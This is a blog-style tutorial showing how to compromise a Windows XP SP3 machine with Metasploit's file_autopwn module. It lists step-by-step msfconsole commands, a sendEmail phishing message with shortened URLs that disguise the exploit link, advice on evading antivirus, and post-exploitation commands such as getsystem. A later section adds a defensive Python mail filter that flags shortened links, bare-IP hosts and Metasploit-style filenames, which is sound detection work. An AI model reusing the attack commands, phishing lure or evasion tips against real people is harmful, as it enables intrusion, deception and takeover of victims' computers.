Owning Windows (XP SP3 vs. Metasploit's File_autopwn)

This screencast demonstrates Metasploit's ability to automatically generate a batch of malicious files, each crafted to trigger a known vulnerability in the application that opens it (a "file format" exploit), and to serve those files from its own web server.

After choosing a file to use, the attacker sends an email to the target containing a masked (shortened) URL to the exploit file, along with a link to the application that opens it, pointing at the exact vulnerable version.

Other examples of Metasploit's "autopwn" features: db_autopwn and browser_autopwn.

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/Owning_Windows-XP_SP3_Vs._file_autopwn.mp4

Tools

  • Metasploit – (Can be found on BackTrack 4-R2). Download here
  • SendEmail SMTP details – (SendEmail can be found on BackTrack 4-R2). Download sendemail here
  • URL shortener service – (Can be found by using an Internet search engine).

Method

  • Start network services and obtain an IP address
  • Start metasploit and configure file_autopwn
  • Wait for web server to be active
  • Browse the available files and view the information for the chosen one
  • Discover the application's homepage and download information
  • Create masked URLs
  • Socially engineer an email to the target with all the information
  • Wait for target to download the file and load it in the program
  • Game Over

Commands

start-network
dhclient eth0
clear

msfconsole
search autopwn
use server/file_autopwn
show options
set LHOST 192.168.0.33
set SRVPORT 80
set URIPATH /
#set SSL true
#set ExitOnSession false
show options
#show advanced
#set CREATEFILES false
run

Firefox -> 192.168.0.33 -> Ctrl + F -> fatplayer

search fatplayer
info windows/fileformat/fatplayer_wav

Firefox -> http://www.shorturl.com -> http://192.168.0.33/windows_fileformat_videolan_tivo_msf.ty
Firefox -> Google -> FatPlayer -> Files -> Fat Player -> Fat Player 0.6b -> FatPlayer_06b_Win32.exe   # http://sourceforge.net/projects/fatplayer/files/Fat%20Player/Fat%20Player%200.6b/FatPlayer_06b_Win32.exe/download

sendEmail -f "Attacker <[email protected]>" -t [email protected] -u "You've gonna listen to this" -m "O.M.G.
CHECK THIS OUT. You HAVE to listen to this as soon as you can [URL].

You'll need to grab this ([URL]) to listen to it." -s [smtp host] -xu [smtp user] -xp [smtp pass]

#IE -> Email provider -> [email protected]:******************* -> Download FatPlayer -> Install/Extract -> Click exploit link

sessions -l -v
sessions -i 1
sysinfo
getuid
getsystem
getuid

Walkthrough

Unlike a remote service exploit, this attack targets a desktop application installed on the operating system (OS) by using a client-side exploit for a "file format" vulnerability: a crafted input file triggers a bug when the application parses it, so the target has to open the file for the exploit to fire.

To start things, the attacker starts Metasploit and locates the file_autopwn module. After examining the required options, the attacker enters all the details which are needed (the listening address, the port and the URI path). Once this has been done, the attacker sets Metasploit to work: it generates a large batch of exploit files, one per file-format module, and then starts a web server that serves them, which is going to be the delivery method.

The attacker visits the web server themselves to see what is available. After choosing the program "FatPlayer", they decide to increase their chance of success by finding the program's homepage so they can pass this information on to the target, which makes it "nice and easy" for the target to download and run the application.

The attacker needs to make sure that the target installs a vulnerable version of the program, so they check the exploit module's info page to see which version(s) the file exploit affects, and link to exactly that version.

The attacker chooses to socially engineer the target by sending them an email with a link to the application installer, a link to the exploit file and a brief description. To help increase success, the attacker masks both URLs by using URL shortening services, which hides the bare IP address and the tell-tale file name. Once the target clicks on the shortened link, they are automatically redirected to the "longer URL".

The attacker then simply waits to see if the target "falls for it", installs the program and opens the exploit file... which the target does. =)
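The lure in this walkthrough leans on two things a mail filter can look for: shortened links that hide where they really go, and a final destination that is a bare IP address serving a file named the way file_autopwn names its output (the post's own listing shows windows_fileformat_videolan_tivo_msf.ty, i.e. the module path with "_msf" before the extension). The following is an added example written for this page, not code from the original post or from Metasploit. The shortener domain list, the "_msf" filename heuristic and the sample email are assumptions; the redirect table stands in for the HEAD request a real filter would send to expand each short link.

```python
import re
from ipaddress import ip_address
from urllib.parse import urlparse

# Assumption: a short, illustrative list of shortener domains, not an
# authoritative one. shorturl.com is the service used in the post.
SHORTENER_DOMAINS = {"shorturl.com", "bit.ly", "tinyurl.com", "goo.gl"}

# Heuristic for file_autopwn output names such as
# windows_fileformat_videolan_tivo_msf.ty (seen in the post's commands):
# a module-style name, "_msf", then a short extension, at the end of the path.
MSF_FILE_RE = re.compile(r"/[a-z0-9_]+_msf\.[a-z0-9]{1,5}$", re.I)

URL_RE = re.compile(r"https?://[^\s<>()\"']+", re.I)


def is_bare_ip(host):
    """True if the host part of a URL is a literal IPv4/IPv6 address."""
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def expand(url, resolver):
    """Follow a shortened link to its final URL.

    `resolver(url)` returns the Location a shortener redirects to, or None.
    A production filter would issue a HEAD request without following
    redirects; here the caller injects a constructed table. The loop is
    capped so a redirect cycle cannot spin forever.
    """
    seen = []
    while url not in seen and len(seen) < 5:
        seen.append(url)
        host = (urlparse(url).hostname or "").lower()
        if host not in SHORTENER_DOMAINS:
            break
        nxt = resolver(url)
        if not nxt:
            break
        url = nxt
    return url


def score_message(body, resolver):
    """Return [(url_as_sent, final_url, [reasons])] for links worth flagging.

    Links with no reason are omitted, so a plain link to a vendor site
    produces no finding.
    """
    findings = []
    for url in URL_RE.findall(body):
        url = url.rstrip(".,)")           # trailing punctuation from the prose
        final = expand(url, resolver)
        parsed = urlparse(final)
        host = (parsed.hostname or "").lower()
        reasons = []
        if final != url:
            reasons.append("shortened link")
        if is_bare_ip(host):
            reasons.append("bare IP host")
        if MSF_FILE_RE.search(parsed.path):
            reasons.append("metasploit-style generated filename")
        if reasons:
            findings.append((url, final, reasons))
    return findings


# Constructed sample: the post's lure text with two made-up short links
# (the short codes are invented) and a direct link to the project page.
SAMPLE_BODY = """O.M.G.
CHECK THIS OUT. You HAVE to listen to this as soon as you can http://shorturl.com/a1b2c3.

You'll need to grab this (http://shorturl.com/d4e5f6) to listen to it.
Project page: http://sourceforge.net/projects/fatplayer/
"""

# Constructed redirect table standing in for the shortener's HTTP responses.
SAMPLE_REDIRECTS = {
    "http://shorturl.com/a1b2c3": "http://192.168.0.33/windows_fileformat_videolan_tivo_msf.ty",
    "http://shorturl.com/d4e5f6": "http://sourceforge.net/projects/fatplayer/files/"
                                  "Fat%20Player/Fat%20Player%200.6b/FatPlayer_06b_Win32.exe/download",
}

def SAMPLE_RESOLVER(url):
    return SAMPLE_REDIRECTS.get(url)


if __name__ == "__main__":
    for sent, final, reasons in score_message(SAMPLE_BODY, SAMPLE_RESOLVER):
        print(f"{sent} -> {final}\n    {', '.join(reasons)}")
```

Run against the sample, the first short link is flagged on all three counts (shortened, bare IP, "_msf" filename) and the second only as shortened, since it lands on the real SourceForge download; the direct project-page link is not reported. The filename heuristic is cheap to defeat by renaming the served file, which is exactly why the bare-IP and shortener checks are kept alongside it rather than relying on any one signal.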

Notes

  • You will need to find/use your own SMTP details.
  • You can use any number of URL shortening services.
  • You could have used any of the files generated by Metasploit.
  • You could have attached the file instead of linking to it in the email (See here for an example), however a lot of email services now have anti-virus checking built in, which is likely to catch a known Metasploit file-format payload before it reaches the target...

Song: Sidney Samson (featuring Wizard Sleeve) - Riverside (Lets Go!) (Warren Clarke Remix)

Video length: 6:00

Capture length: 18:11

Blog Post: https://blog.g0tmi1k.com/2011/03/owning-windows-xp-sp3-vs/